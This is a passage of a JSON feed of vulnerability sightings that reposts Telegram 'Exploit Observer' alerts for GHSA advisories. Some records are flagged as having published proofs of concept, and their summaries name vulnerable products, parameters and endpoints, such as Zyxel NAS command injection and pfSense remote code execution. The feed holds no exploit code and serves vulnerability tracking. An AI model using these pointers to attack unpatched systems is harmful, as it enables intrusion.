"source": "https://t.me/arpsyndicate/3779", "content": "#ExploitObserverAlert\n\nGHSA-jfrg-9hpq-9hvp\n\nDESCRIPTION: Exploit Observer has 5 entries in 3 file formats related to GHSA-jfrg-9hpq-9hvp. Improper Access Control in moodle", "creation_timestamp": "2024-02-21T13:46:12.000000Z"}, {"uuid": "ea2c1f25-2522-45f1-87f6-0ef56b3c3848", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8XFF-473H-F863", "type": "seen", "source": "https://t.me/arpsyndicate/3793", "content": "#ExploitObserverAlert\n\nGHSA-8xff-473h-f863\n\nDESCRIPTION: Exploit Observer has 1 entries in 1 file formats related to GHSA-8xff-473h-f863. Uncaught Exception Handling Parsing Errors on Line Terminators", "creation_timestamp": "2024-02-21T14:06:28.000000Z"}, {"uuid": "ef23c2f5-1aaa-483b-ac91-d340eb201fc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7PJP-FM93-P6PJ", "type": "seen", "source": "https://t.me/arpsyndicate/3789", "content": "#ExploitObserverAlert\n\nGHSA-7pjp-fm93-p6pj\n\nDESCRIPTION: Exploit Observer has 5 entries in 3 file formats related to GHSA-7pjp-fm93-p6pj. Cross-Site Request Forgery in moodle", "creation_timestamp": "2024-02-21T14:00:37.000000Z"}, {"uuid": "d2ad92e2-3c00-40dd-b711-6b9bcd933ed4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PFVH-CHXV-CCFM", "type": "seen", "source": "https://t.me/arpsyndicate/300", "content": "#ExploitObserverAlert\n\nGHSA-pfvh-chxv-ccfm\n\nDESCRIPTION: Exploit Observer has 15 entries related to GHSA-PFVH-CHXV-CCFM. In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.", "creation_timestamp": "2023-11-20T16:37:09.000000Z"}, {"uuid": "a5487282-ac86-4574-a9f6-c2f9a552bf64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3FVF-6Q4J-WVC7", "type": "seen", "source": "https://t.me/arpsyndicate/853", "content": "#ExploitObserverAlert\n\nGHSA-3fvf-6q4j-wvc7\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-3FVF-6Q4J-WVC7. A vulnerability classified as problematic was found in Netgear SRX5308 up to 4.3.5-3. Affected by this vulnerability is an unknown functionality of the file scgi-bin/platform.cgi?page=dmz_setup.htm of the component Web Management Interface. The manipulation of the argument winsServer1 leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227665 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n\nGHSS: 2.4", "creation_timestamp": "2023-12-01T09:32:21.000000Z"}, {"uuid": "d5e032b6-8037-4a82-8698-7715b394b181", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2GQH-F22G-JH9G", "type": "seen", "source": "https://t.me/arpsyndicate/903", "content": "#ExploitObserverAlert\n\nGHSA-2gqh-f22g-jh9g\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-2GQH-F22G-JH9G. A post-authentication command injection vulnerability in the WSGI server of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an authenticated attacker to execute some operating system (OS) commands by sending a crafted URL to a vulnerable device.\n\nGHSS: 8.8", "creation_timestamp": "2023-12-03T00:25:57.000000Z"}, {"uuid": "75ac8338-4476-4be3-9032-75e9e312e471", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3W9R-2MQJ-CF5C", "type": "seen", "source": "https://t.me/arpsyndicate/901", "content": "#ExploitObserverAlert\n\nGHSA-3w9r-2mqj-cf5c\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-3W9R-2MQJ-CF5C. Integer Overflow vulnerability in qsvghandler.cpp in Qt qtsvg versions 5.15.1, 6.0.0, 6.0.2, and 6.2, allows local attackers to cause a denial of service (DoS).\n\nGHSS: 5.5", "creation_timestamp": "2023-12-03T00:15:23.000000Z"}, {"uuid": "c0869319-e81d-4c39-8432-0ebe2558d2b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FVX4-8H2X-GM9Q", "type": "seen", "source": "https://t.me/arpsyndicate/794", "content": "#ExploitObserverAlert\n\nGHSA-fvx4-8h2x-gm9q\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-FVX4-8H2X-GM9Q.\n\nGHSS: 8.8", "creation_timestamp": "2023-11-30T07:43:08.000000Z"}, {"uuid": "2d10c0ab-b455-4b13-945d-deb75d87cbd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HCXX-MP6G-6GR9", "type": "seen", "source": "https://t.me/arpsyndicate/2244", "content": "#ExploitObserverAlert\n\nGHSA-hcxx-mp6g-6gr9\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-HCXX-MP6G-6GR9. The issue was mostly mitigated before, drastically reducing the risk. See references below for more information.\n\nGHSS: 7.5", "creation_timestamp": "2023-12-29T11:45:54.000000Z"}, {"uuid": "ff3c411c-6cc5-45be-8d24-347506508238", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7X4V-9GXG-9HWJ", "type": "seen", "source": "https://t.me/arpsyndicate/2369", "content": "#ExploitObserverAlert\n\nGHSA-7x4v-9gxg-9hwj\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-7X4V-9GXG-9HWJ. When running with XLA, tf.raw_ops.Bincount segfaults when given a parameter weights that is neither the same shape as parameter arr nor a length-0 tensor.\n\nGHSS: 7.5", "creation_timestamp": "2024-01-03T22:27:50.000000Z"}, {"uuid": "f6b433cb-3930-4ee3-bb7d-c65886a0cff2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XPJG-7HX7-WGCX", "type": "seen", "source": "https://t.me/arpsyndicate/4062", "content": "#ExploitObserverAlert\n\nGHSA-xpjg-7hx7-wgcx\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-xpjg-7hx7-wgcx. Liferay Portal and Liferay DXP vulnerable to Cross-site Scripting", "creation_timestamp": "2024-02-22T21:43:31.000000Z"}, {"uuid": "63350619-91f0-4d15-8557-ba52325c4dfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54PV-R62J-9QQC", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4059", "content": "#ExploitObserverAlert\n\nGHSA-54pv-r62j-9qqc\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-54pv-r62j-9qqc. Liferay Portal and Liferay DXP vulnerable to reflected Cross-site Scripting", "creation_timestamp": "2024-02-22T21:32:47.000000Z"}, {"uuid": "07554252-9e94-4bd9-a7e2-c61b5b7b2f52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6MJP-2RM6-9G85", "type": "seen", "source": "https://t.me/arpsyndicate/2409", "content": "#ExploitObserverAlert\n\nGHSA-6mjp-2rm6-9g85\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-6MJP-2RM6-9G85. The CKEditor.HTMLConverter document lacked a protection against Cross-Site Request Forgery (CSRF), allowing to execute macros with the rights of the current user. If a privileged user with programming rights was tricked into executing a GET request to this document with certain parameters (e.g., via an image with a corresponding URL embedded in a comment or via a redirect), this would allow arbitrary remote code execution and the attacker could gain rights, access private information or impact the availability of the wiki.\n\nGHSS: 9.0", "creation_timestamp": "2024-01-04T02:29:09.000000Z"}, {"uuid": "e9dad66a-fc48-4ffe-84dc-e102f7d3310b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2CCF-FFRJ-M4QW", "type": "seen", "source": "https://t.me/arpsyndicate/2398", "content": "#ExploitObserverAlert\n\nGHSA-2ccf-ffrj-m4qw\n\nDESCRIPTION: Exploit Observer has 5 entries related to GHSA-2CCF-FFRJ-M4QW. The CSRF protection enforced by the @fastify/csrf-protection library, when combined with @fastify/passport, can be bypassed by network and same-site attackers.\n\nGHSS: 6.5", "creation_timestamp": "2024-01-04T01:25:40.000000Z"}, {"uuid": "746dea0f-a119-4537-b061-1b7d47532da4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2XM-P6VQ-482G", "type": "seen", "source": "https://t.me/arpsyndicate/2390", "content": "#ExploitObserverAlert\n\nGHSA-x2xm-p6vq-482g\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-X2XM-P6VQ-482G. OroPlatform is a package that assist system and user calendar management. Back-office users can access information from any system calendar event, bypassing ACL security restrictions due to insufficient security checks.\n\nGHSS: 5.0", "creation_timestamp": "2024-01-04T00:42:40.000000Z"}, {"uuid": "c57d2d00-023f-4efd-8862-9917b5a2ce03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M88M-CRR9-JVQQ", "type": "seen", "source": "https://t.me/arpsyndicate/2343", "content": "#ExploitObserverAlert\n\nGHSA-m88m-crr9-jvqq\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-M88M-CRR9-JVQQ. A carefully crafted malicious OpenRefine project tar file can be used to trigger arbitrary code execution if a user can be convinced to import it.\n\nGHSS: 5.5", "creation_timestamp": "2024-01-03T19:02:41.000000Z"}, {"uuid": "38328d9e-3cc8-4475-826d-7e183cde4de7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X3F3-J7QH-9WGJ", "type": "seen", "source": "https://t.me/arpsyndicate/2242", "content": "#ExploitObserverAlert\n\nGHSA-x3f3-j7qh-9wgj\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-X3F3-J7QH-9WGJ. An OS command injection vulnerability exists in AE1021PE firmware version 2.0.9 and earlier and AE1021 firmware version 2.0.9 and earlier. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.\n\nGHSS: 8.8", "creation_timestamp": "2023-12-29T11:35:52.000000Z"}, {"uuid": "d2f03f2f-8aaa-4e5c-a151-eb84816dcee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q264-W97Q-Q778", "type": "seen", "source": "https://t.me/arpsyndicate/2354", "content": "#ExploitObserverAlert\n\nGHSA-q264-w97q-q778\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-Q264-W97Q-Q778. Trying to read malformed HAMT sharded directories can cause panics and virtual memory leaks. If you are reading untrusted user input, an attacker can then trigger a panic.\n\nGHSS: 5.9", "creation_timestamp": "2024-01-03T20:27:27.000000Z"}, {"uuid": "f5c7dd69-366e-407d-a576-1cdcf0dc89c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MP2M-2429-RGFV", "type": "seen", "source": "https://t.me/arpsyndicate/2315", "content": "#ExploitObserverAlert\n\nGHSA-mp2m-2429-rgfv\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-MP2M-2429-RGFV. An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.\n\nGHSS: 8.8", "creation_timestamp": "2024-01-02T04:24:02.000000Z"}, {"uuid": "d32349cc-5bea-45f3-89ef-554f1a905cbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PVVF-569H-5779", "type": "seen", "source": "https://t.me/arpsyndicate/2314", "content": "#ExploitObserverAlert\n\nGHSA-pvvf-569h-5779\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-PVVF-569H-5779. Azure HDInsight Apache Oozie Workflow Scheduler Elevation of Privilege Vulnerability", "creation_timestamp": "2024-01-02T04:10:32.000000Z"}, {"uuid": "4452ff2b-4ee6-458d-a67d-3b6f5b988631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GC57-XHH5-M94R", "type": "seen", "source": "https://t.me/arpsyndicate/2329", "content": "#ExploitObserverAlert\n\nGHSA-gc57-xhh5-m94r\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-GC57-XHH5-M94R. The endpoint /api/collaboration/{id}/task is used to collect all tasks from a certain collaboration. To get such tasks, a user should have permission to view the collaboration and to view the tasks in it. However, currently it is only checked if the user has permission to view the collaboration.\n\nGHSS: 5.4", "creation_timestamp": "2024-01-03T16:25:38.000000Z"}, {"uuid": "309e2cb9-705d-4c5d-a248-ae89171a8614", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VP66-GF7W-9M4X", "type": "seen", "source": "https://t.me/arpsyndicate/3822", "content": "#ExploitObserverAlert\n\nGHSA-vp66-gf7w-9m4x\n\nDESCRIPTION: Exploit Observer has 6 entries in 3 file formats related to GHSA-vp66-gf7w-9m4x. Insufficient Session Expiration in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T14:54:12.000000Z"}, {"uuid": "77a6e8a0-cb5b-4faf-96b9-41349f095a7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9R26-5W88-QHP9", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3787", "content": "#ExploitObserverAlert\n\nGHSA-9r26-5w88-qhp9\n\nDESCRIPTION: Exploit Observer has 5 entries in 3 file formats related to GHSA-9r26-5w88-qhp9. Authorization Bypass in moodle", "creation_timestamp": "2024-02-21T13:58:05.000000Z"}, {"uuid": "82778626-bece-49e4-ac16-86b7bb6f9450", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3366-9287-7QPR", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3786", "content": "#ExploitObserverAlert\n\nGHSA-3366-9287-7qpr\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-3366-9287-7qpr. Path disclosure in JavaScript variable", "creation_timestamp": "2024-02-21T13:56:37.000000Z"}, {"uuid": "c469f80f-f696-444b-bcc7-53b020087f25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6VJF-48FH-VXXJ", "type": "seen", "source": "https://t.me/arpsyndicate/3783", "content": "#ExploitObserverAlert\n\nGHSA-6vjf-48fh-vxxj\n\nDESCRIPTION: Exploit Observer has 5 entries in 3 file formats related to GHSA-6vjf-48fh-vxxj. Improper Handling of Parameters in moodle", "creation_timestamp": "2024-02-21T13:52:31.000000Z"}, {"uuid": "89f82190-4f60-45ea-947d-9af742ac12bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q3GG-M8HR-H4X4", "type": "seen", "source": "https://t.me/arpsyndicate/3788", "content": "#ExploitObserverAlert\n\nGHSA-q3gg-m8hr-h4x4\n\nDESCRIPTION: Exploit Observer has 1 entries in 1 file formats related to GHSA-q3gg-m8hr-h4x4. Externally Controlled Format String in Scripting Functions", "creation_timestamp": "2024-02-21T13:59:02.000000Z"}, {"uuid": "85cf3088-2c60-43e4-ab5e-921bc2795f49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43V2-6GRP-9PP9", "type": "seen", "source": "https://t.me/arpsyndicate/4010", "content": "#ExploitObserverAlert\n\nGHSA-43v2-6grp-9pp9\n\nDESCRIPTION: Exploit Observer has 13 entries in 3 file formats related to GHSA-43v2-6grp-9pp9. Apache Tomcat does not enforce the maxHttpHeaderSize limit", "creation_timestamp": "2024-02-22T19:16:57.000000Z"}, {"uuid": "f8ef4dd5-539d-4834-a922-9640b1f7e661", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24RP-Q3W6-VC56", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4002", "content": "#ExploitObserverAlert\n\nGHSA-24rp-q3w6-vc56\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-24rp-q3w6-vc56. org.postgresql:postgresql vulnerable to SQL Injection via line comment generation", "creation_timestamp": "2024-02-22T18:57:59.000000Z"}, {"uuid": "0a4f739d-2581-4cea-a495-0bde6e1dbca2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6VQW-3V5J-54X4", "type": "seen", "source": "https://t.me/arpsyndicate/3950", "content": "#ExploitObserverAlert\n\nGHSA-6vqw-3v5j-54x4\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-6vqw-3v5j-54x4. cryptography NULL pointer deference with pkcs12.serialize_key_and_certificates when called with a non-matching certificate and private key and an hmac_hash override", "creation_timestamp": "2024-02-22T09:49:21.000000Z"}, {"uuid": "1dd6a73c-a596-4c7c-8b01-387b143ab0ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5PM-H33Q-CJRW", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3869", "content": "#ExploitObserverAlert\n\nGHSA-x5pm-h33q-cjrw\n\nDESCRIPTION: Exploit Observer has 4 entries in 3 file formats related to GHSA-x5pm-h33q-cjrw. Improper Certificate Validation in apache airflow mongo hook", "creation_timestamp": "2024-02-21T21:22:18.000000Z"}, {"uuid": "1e7d1fa6-88c2-4c05-b8db-5da63dafa52b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJQC-G788-F378", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3863", "content": "#ExploitObserverAlert\n\nGHSA-vjqc-g788-f378\n\nDESCRIPTION: Exploit Observer has 5 entries in 3 file formats related to GHSA-vjqc-g788-f378. Session Fixation Apache DolphinScheduler", "creation_timestamp": "2024-02-21T21:14:51.000000Z"}, {"uuid": "3a44caf0-455a-4b99-8587-f9ce4f559a0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R48H-JR2J-9G78", "type": "seen", "source": "https://t.me/arpsyndicate/4006", "content": "#ExploitObserverAlert\n\nGHSA-r48h-jr2j-9g78\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to GHSA-r48h-jr2j-9g78.  HashiCorp Terraform Amazon Web Services (AWS) uses an insecure PRNG", "creation_timestamp": "2024-02-22T19:06:42.000000Z"}, {"uuid": "07469b06-5da1-4065-861c-fc19df5ff21a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HGR6-6HHW-883F", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4005", "content": "#ExploitObserverAlert\n\nGHSA-hgr6-6hhw-883f\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-hgr6-6hhw-883f. Liferay Portal Calendar module and Liferay DXP vulnerable to Cross-site Scripting, content spoofing", "creation_timestamp": "2024-02-22T19:04:49.000000Z"}, {"uuid": "b7d632b9-3e38-4aa1-8058-da5400f39872", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWHV-HVJ2-QRQM", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4004", "content": "#ExploitObserverAlert\n\nGHSA-rwhv-hvj2-qrqm\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-rwhv-hvj2-qrqm. Liferay Portal Frontend JS module's portlet.js and Liferay DXP vulnerable to Cross-site Scripting", "creation_timestamp": "2024-02-22T19:02:19.000000Z"}, {"uuid": "78ef07c3-6afa-4cf5-acc8-085541ae2fa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84XV-JFRM-H4GM", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4003", "content": "#ExploitObserverAlert\n\nGHSA-84xv-jfrm-h4gm\n\nDESCRIPTION: Exploit Observer has 4 entries in 3 file formats related to GHSA-84xv-jfrm-h4gm. registry-supper Path Traversal vulnerability", "creation_timestamp": "2024-02-22T19:00:30.000000Z"}, {"uuid": "677b2872-9007-4fd5-9c1a-277cb18ae11b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HFP-M9GV-M753", "type": "seen", "source": "https://t.me/arpsyndicate/3962", "content": "#ExploitObserverAlert\n\nGHSA-4hfp-m9gv-m753\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-4hfp-m9gv-m753. XWiki extension license information is public, exposing instance id and license holder details", "creation_timestamp": "2024-02-22T10:04:57.000000Z"}, {"uuid": "4a1d586c-e99e-42fc-9d15-885b63725195", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93X8-66J2-WWR5", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3772", "content": "#ExploitObserverAlert\n\nGHSA-93x8-66j2-wwr5\n\nDESCRIPTION: Exploit Observer has 6 entries in 3 file formats related to GHSA-93x8-66j2-wwr5. Server-Side Request Forgery in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T13:36:21.000000Z"}, {"uuid": "dca7e8d3-0958-4218-9ab5-5f0d212d1644", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3W4H-R27H-4R2W", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3748", "content": "#ExploitObserverAlert\n\nGHSA-3w4h-r27h-4r2w\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-3w4h-r27h-4r2w. TYPO3 Image Processing susceptible to Code Execution", "creation_timestamp": "2024-02-21T07:53:10.000000Z"}, {"uuid": "8d41d77c-a7b4-4476-9cda-1200b75888dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QVH3-87RF-GC36", "type": "seen", "source": "https://t.me/arpsyndicate/594", "content": "#ExploitObserverAlert\n\nGHSA-qvh3-87rf-gc36\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-QVH3-87RF-GC36. A Cross Site Request Forgery vulnerability in ePolicy Orchestrator prior to 5.10.0 CP1 Update 2 allows a remote low privilege user to successfully add a new user with administrator privileges to the ePO server. This impacts the dashboard area of the user interface. To exploit this the attacker must change the HTTP payload post submission, prior to it reaching the ePO server.\n\nGHSS: 8.0", "creation_timestamp": "2023-11-27T21:48:22.000000Z"}, {"uuid": "bc13ae88-327e-4712-b560-6bfa8c9583b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JHPC-56WJ-35J2", "type": "seen", "source": "https://t.me/arpsyndicate/786", "content": "#ExploitObserverAlert\n\nGHSA-jhpc-56wj-35j2\n\nDESCRIPTION: Exploit Observer has 5 entries related to GHSA-JHPC-56WJ-35J2.\n\nGHSS: 6.5", "creation_timestamp": "2023-11-30T06:47:52.000000Z"}, {"uuid": "94809ed2-c4ac-434e-83f0-25e9de2d534f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CX99-25HR-5JXF", "type": "seen", "source": "https://t.me/arpsyndicate/2872", "content": "#ExploitObserverAlert\n\nGHSA-cx99-25hr-5jxf\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-CX99-25HR-5JXF. An authenticated and unauthorized user can access the back-office orders list and be able to query over the information returned.\n\nGHSS: 4.3", "creation_timestamp": "2024-01-16T19:02:56.000000Z"}, {"uuid": "85d46ef6-6807-44a0-8b25-b2ac53b83743", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8H2X-GR2C-C275", "type": "seen", "source": "https://t.me/arpsyndicate/2868", "content": "#ExploitObserverAlert\n\nGHSA-8h2x-gr2c-c275\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-8H2X-GR2C-C275. A vulnerability was found in CubeFS that could allow users to read sensitive data from the logs which could allow them escalate privileges.\n\nGHSS: 4.8", "creation_timestamp": "2024-01-16T18:26:02.000000Z"}, {"uuid": "8172f753-97ce-452e-b923-6c08a6795666", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G3H-V9FP-PGM4", "type": "seen", "source": "https://t.me/arpsyndicate/2866", "content": "#ExploitObserverAlert\n\nGHSA-4g3h-v9fp-pgm4\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to GHSA-4G3H-V9FP-PGM4. A vulnerability was found in Avahi. A reachable assertion exists in the avahi_rdata_parse() function.\n\nGHSS: 6.2", "creation_timestamp": "2024-01-16T17:28:36.000000Z"}, {"uuid": "19c47e80-2165-4f2b-9458-8c2ee482b1bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6JJ9-4HH8-6XPV", "type": "seen", "source": "https://t.me/arpsyndicate/861", "content": "#ExploitObserverAlert\n\nGHSA-6jj9-4hh8-6xpv\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-6JJ9-4HH8-6XPV. Use after free in Mojo in Google Chrome prior to 119.0.6045.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "creation_timestamp": "2023-12-02T00:11:05.000000Z"}, {"uuid": "1b8db65f-4179-4d3f-a57a-a655e629c720", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VX8V-G3P3-88VG", "type": "seen", "source": "https://t.me/arpsyndicate/824", "content": "#ExploitObserverAlert\n\nGHSA-vx8v-g3p3-88vg\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-VX8V-G3P3-88VG. The secrethash, which the application relies for multiple security measures, can be brute-forced. The hash is quite small, with only 10 characters of only hexadecimal, making 16^10 possilibities ( 1.099.511.627.776 ). The SHA1 of the secret can be obtained via a captcha string and brute-forced offline with an GPU.\n\nGHSS: 7.5", "creation_timestamp": "2023-11-30T19:25:05.000000Z"}, {"uuid": "a4e59eaf-190e-4acb-9b11-c52f8a6b5394", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W244-M45P-G2FH", "type": "seen", "source": "https://t.me/arpsyndicate/825", 